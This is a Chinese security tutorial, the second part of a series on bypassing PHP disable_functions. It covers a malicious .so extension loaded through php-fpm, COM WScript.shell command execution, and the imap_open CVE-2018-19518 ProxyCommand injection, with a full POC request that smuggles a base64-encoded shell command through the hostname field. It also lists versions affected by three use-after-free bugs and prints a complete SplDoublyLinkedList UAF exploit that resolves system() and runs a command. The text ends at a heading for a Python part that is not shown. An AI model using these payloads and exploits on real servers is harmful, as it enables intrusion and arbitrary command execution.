php中函数禁用绕过的原理与利用（下）

本文首发于“合天网安实验室”作者： HhhM

加载so扩展

前面虽然解释了其原理，但毕竟理论与实践有所区别，因此我们可以自己打一下extension进行测试。

so文件可以从项目中获取，根据其提示编译即可获取ant.so的库，修改php-fpm的php.ini，加入：

 extension=/var/www/html/ant.so

然后重启php-fpm，如果使用如下:

成功执行命令时即说明扩展成功加载，那么我们再把ini恢复为先前的样子，我们尝试直接攻击php-fpm来修改其配置项。

以脚本来攻击:

通过修改其内的code即可，效果如下：

漏洞利用成功。

com组件

原理&利用

需要目标机器满足下列三个条件：

com.allow_dcom = true
extension=php_com_dotnet.dll
php>5.4

此时com组件开启，我们能够在phpinfo中看到：

要知道原理还是直接从exp看起：

首先，以 new COM(‘WScript.shell’) 来生成一个com对象，里面的参数也可以为 Shell.Application （笔者的win10下测试失败）。

然后这个com对象中存在着exec可以用来执行命令，而后续的方法则是将命令输出，该方式的利用还是较为简单的，就不多讲了。

imap_open

该bypass方式为CVE-2018-19518

原理

imap扩展用于在PHP中执行邮件收发操作，而imap_open是一个imap扩展的函数，在使用时通常以如下形式：

 $imap = imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']);

那么该函数在调用时会调用rsh来连接远程shell，而在debian/ubuntu中默认使用ssh来代替rsh的功能，也即是说在这俩系统中调用的实际上是ssh，而ssh中可以通过 -oProxyCommand= 来调用命令，该选项可以使得我们在连接服务器之前先执行命令，并且需要注意到的是此时并不是php解释器在执行该系统命令，其以一个独立的进程去执行了该命令，因此我们也就成功的bypass disable function了。

那么我们可以先在ubuntu上试验一下：

 ssh -oProxyCommand="ls>test" 192.168.2.1

环境的话vulhub上有，其中给出了poc：

 POST / HTTP/1.1Host: your-ipAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 125hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222

我们可以发现其中使用了%09来绕过空格，以base64的形式来执行我们的命令，那么我这里再验证一下：

 hostname=x+-oProxyCommand%3decho%09bHM%2BdGVzdAo%3D|base64%09-d|sh}&username=111&password=222//ls>test

会发现成功写入了一个test，漏洞利用成功，那么接下来就是各种肆意妄为了。

三种UAF

EXP在：

三种uaf分别是：

Json Serializer UAF
GC UAF
Backtrace UAF

关于uaf的利用因为涉及到二进制相关的知识，而笔者是个web狗，因此暂时只会用exp打打，因此这里就不多说，就暂时先稍微提一下三种uaf的利用版本及其概述//其实我就是照搬了exp里面的说明，读者可以看exp作者的说明就行了。

Json Serializer UAF

漏洞出现的版本在于：

7.1 – all versions to date
7.2 < 7.2.19 (released: 30 May 2019)
7.3 < 7.3.6 (released: 30 May 2019)

漏洞利用json在序列化中的堆溢出触发bypass，漏洞为bug #77843

GC UAF

漏洞出现的版本在于：

7.0 – all versions to date
7.1 – all versions to date
7.2 – all versions to date
7.3 – all versions to date

漏洞利用的是php garbage collector（垃圾收集器）程序中的堆溢出达成bypass，漏洞为：bug #72530

Backtrace UAF

漏洞出现的版本在于：

7.0 – all versions to date
7.1 – all versions to date
7.2 – all versions to date
7.3 < 7.3.15 (released 20 Feb 2020)
7.4 < 7.4.3 (released 20 Feb 2020)

漏洞利用的是 debug_backtrace这个函数，可以利用该函数的漏洞返回已经销毁的变量的引用达成堆溢出，漏洞为bug #76047

利用

利用的话exp或者蚁剑上都有利用插件了，这里不多讲，可以上ctfhub测试。

SplDoublyLinkedList UAF

概述

这个UAF是在先知上看到的，引用原文来概述：

exp

exp同样出自原文。

php部分：

 <?phperror_reporting(0);$a = str_repeat("T", 120 * 1024 * 1024);function i2s(&$a, $p, $i, $x = 8) {    for($j = 0;$j < $x;$j++) {        $a[$p + $j] = chr($i & 0xff);        $i >>= 8;    }}function s2i($s) {    $result = 0;    for ($x = 0;$x < strlen($s);$x++) {        $result <<= 8;        $result |= ord($s[$x]);    }    return $result;}function leak(&$a, $address) {    global $s;    i2s($a, 0x00, $address - 0x10);    return strlen($s -> current());}function getPHPChunk($maps) {    $pattern = '/([0-9a-f]+\-[0-9a-f]+) rw\-p 00000000 00:00 0 /';    preg_match_all($pattern, $maps, $match);    foreach ($match[1] as $value) {        list($start, $end) = explode("-", $value);        if (($length = s2i(hex2bin($end)) - s2i(hex2bin($start))) >= 0x200000 && $length <= 0x300000) {            $address = array(s2i(hex2bin($start)), s2i(hex2bin($end)), $length);            echo "[+]PHP Chunk: " . $start . " - " . $end . ", length: 0x" . dechex($length) . "\n";            return $address;        }    }}function bomb1(&$a) {    if (leak($a, s2i($_GET["test1"])) === 0x5454545454545454) {        return (s2i($_GET["test1"]) & 0x7ffff0000000);    }else {        die("[!]Where is here");    }}function bomb2(&$a) {    $start = s2i($_GET["test2"]);    return getElement($a, array($start, $start + 0x200000, 0x200000));    die("[!]Not Found");}function getElement(&$a, $address) {    for ($x = 0;$x < ($address[2] / 0x1000 - 2);$x++) {        $addr = 0x108 + $address[0] + 0x1000 * $x + 0x1000;        for ($y = 0;$y < 5;$y++) {            if (leak($a, $addr + $y * 0x08) === 0x1234567812345678 && ((leak($a, $addr + $y * 0x08 - 0x08) & 0xffffffff) === 0x01)){                echo "[+]SplDoublyLinkedList Element: " . dechex($addr + $y * 0x08 - 0x18) . "\n";                return $addr + $y * 0x08 - 0x18;            }        }    }}function getClosureChunk(&$a, $address) {    do {        $address = leak($a, $address);    }while(leak($a, $address) !== 0x00);    echo "[+]Closure Chunk: " . dechex($address) . "\n";    return $address;}function getSystem(&$a, $address) {    $start = $address & 0xffffffffffff0000;    $lowestAddr = ($address & 0x0000fffffff00000) - 0x0000000001000000;    for($i = 0; $i < 0x1000 * 0x80; $i++) {        $addr = $start - $i * 0x20;        if ($addr < $lowestAddr) {            break;        }        $nameAddr = leak($a, $addr);        if ($nameAddr > $address || $nameAddr < $lowestAddr) {            continue;        }        $name = dechex(leak($a, $nameAddr));        $name = str_pad($name, 16, "0", STR_PAD_LEFT);        $name = strrev(hex2bin($name));        $name = explode("\x00", $name)[0];        if($name === "system") {            return leak($a, $addr + 0x08);        }    }}class Trigger {    function __destruct() {        global $s;        unset($s[0]);        $a = str_shuffle(str_repeat("T", 0xf));        i2s($a, 0x00, 0x1234567812345678);        i2s($a, 0x08, 0x04, 7);        $s -> current();        $s -> next();        if ($s -> current() !== 0x1234567812345678) {             die("[!]UAF Failed");        }        $maps = file_get_contents("/proc/self/maps");        if (!$maps) {            cantRead($a);        }else {            canRead($maps, $a);        }        echo "[+]Done";    }}function bypass($elementAddress, &$a) {    global $s;    if (!$closureChunkAddress = getClosureChunk($a, $elementAddress)) {        die("[!]Get Closure Chunk Address Failed");    }    $closure_object = leak($a, $closureChunkAddress + 0x18);    echo "[+]Closure Object: " . dechex($closure_object) . "\n";    $closure_handlers = leak($a, $closure_object + 0x18);    echo "[+]Closure Handler: " . dechex($closure_handlers) . "\n";    if(!($system_address = getSystem($a, $closure_handlers))) {        die("[!]Couldn't determine system address");    }    echo "[+]Find system's handler: " . dechex($system_address) . "\n";    i2s($a, 0x08, 0x506, 7);    for ($i = 0;$i < (0x130 / 0x08);$i++) {        $data = leak($a, $closure_object + 0x08 * $i);        i2s($a, 0x00, $closure_object + 0x30);        i2s($s -> current(), 0x08 * $i + 0x100, $data);    }    i2s($a, 0x00, $closure_object + 0x30);    i2s($s -> current(), 0x20, $system_address);    i2s($a, 0x00, $closure_object);    i2s($a, 0x08, 0x108, 7);    echo "[+]Executing command: \n";    ($s -> current())("php -v");}function canRead($maps, &$a) {    global $s;    if (!$chunkAddress = getPHPChunk($maps)) {        die("[!]Get PHP Chunk Address Failed");    }    i2s($a, 0x08, 0x06, 7);    if (!$elementAddress = getElement($a, $chunkAddress)) {        die("[!]Get SplDoublyLinkedList Element Address Failed");    }    bypass($elementAddress, $a);}function cantRead(&$a) {    global $s;    i2s($a, 0x08, 0x06, 7);    if (!isset($_GET["test1"]) && !isset($_GET["test2"])) {        die("[!]Please try to get address of PHP Chunk");    }    if (isset($_GET["test1"])) {        die(dechex(bomb1($a)));    }    if (isset($_GET["test2"])) {        $elementAddress = bomb2($a);    }    if (!$elementAddress) {        die("[!]Get SplDoublyLinkedList Element Address Failed");    }    bypass($elementAddress, $a);}$s = new SplDoublyLinkedList();$s -> push(new Trigger());$s -> push("Twings");$s -> push(function($x){});for ($x = 0;$x < 0x100;$x++) {    $s -> push(0x1234567812345678);}$s -> rewind();unset($s[0]);

python部分：